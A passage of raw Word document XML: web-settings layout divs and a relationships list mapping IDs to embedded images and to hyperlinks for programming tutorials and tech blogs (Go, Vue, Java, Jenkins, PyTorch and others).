            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="877351725">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2104061314">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2112579788">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2119912558">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1600530494">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1887059692">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="21376048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jpeg"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zhuanlan.zhihu.com/p/655052033" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-valueof.html" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-log.html" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git.savannah.gnu.org/cgit/screen.git" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-toradians.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/go-git/go-git" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jenkins.io/zh/doc/book/installing/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://chromedriver.storage.googleapis.com/89.0.4389.23/chromedriver_linux64.zip" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gephi.org/users/download" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:xxxxx@qq.com" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:fyne.io/fyne/v2/cmd/fyne@lastest" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.nvidia.com/zh-cn" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-parseInt.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/spf13/cobra" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://orgmapper.com/gephi-tutorial/" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/Gitea/p/jenkins.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/scala/scala/blob/2.13.x/LICENSE" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fyne-io/systray/" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mirrors.aliyun.com/pypi/simple/" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://router.vuejs.org/zh/" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/weixin_44355549/article/details/108228516" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-sqrt.html" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pytorch.org/get-started/locally/" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/weixin_43545410/article/details/120963125" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/spf13/cobra/blob/main/user_guide.md" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://registry.npmmirror.com/" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-abs.html" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-sin.html" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ctfiot.com/20548.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.aliyun.com/article/269327" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/aiboom/article/details/127324633" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpeg"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zhuanlan.zhihu.com/p/218555418" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/rickiyang/p/11074173.html" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fyne-io/fyne/blob/e332a5e47813bff1af9631cbbfe84654c0143189/app/app_windows.go" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/wuyoudeyuer/article/details/129819096" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/krismile__qh/article/details/98884337" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-ceil.html" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/u013203733/article/details/73870701" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:shenyanjian@gmail.com" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.pytorch.org/whl/torch_stable.html" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zhuanlan.zhihu.com/p/60578464" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:spf@spf13.com%22" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/xc_zhou/article/details/80893289" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://registry.npmjs.org/" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://element-plus.org/zh-CN/component/icon.html" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-cos.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/weixin_44058932/article/details/113368976" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fyne-io/systray/" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://brieflyx.me/2015/linux-tools/socat-introduction/" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-floor.html" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hexo.io/zh-cn/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.visualstudio.com/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/spf13/viper" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://registry.npmmirror.com/" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/312/" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-tan.html" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/BThinker/article/details/124097795" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://c.biancheng.net/view/124.html" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fivezh.github.io/2020/03/09/golang-nil/" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pypi.org/account/login/" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doc.rust-lang.org/book/ch00-00-introduction.html" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-rint.html" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.png"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hexo.io/themes/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ipmitool/ipmitool" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.aliyun.com/article/1504060?spm=5176.26934562.main.1.6a7535dfsJpXKW" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://juejin.cn/post/6844904051369312264" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/cityzenoldwang/article/details/78336992" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/superhin/p/11495956.html" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dishaxy.dishait.cn" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-asin.html" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/12096" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/re2/wiki/Syntax&#65292;golang" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://juejin.cn/post/6977260510483841038" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yelog/hexo-theme-3-hexo" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xzchsia.github.io/2020/03/05/linux-hard-soft-link/" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/django/django-auth.html" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://router.vuejs.org/zh/guide/essentials/dynamic-matching.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/java/technologies/downloads/" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/java/number-round.html" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dell.com/support/home/zh-cn/drivers/driversdetails?driverid=m63f3" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://link.juejin.cn?target=https://github.com/fsnotify/fsnotify" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bbs.huaweicloud.com/blogs/297334" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://so.csdn.net/so/search?q=%E5%AD%90%E7%B1%BB&amp;spm=1001.2101.3001.7020" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wizardforcel.gitbooks.io/flask-extension-docs/content/flask-sqlalchemy.html" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId223" 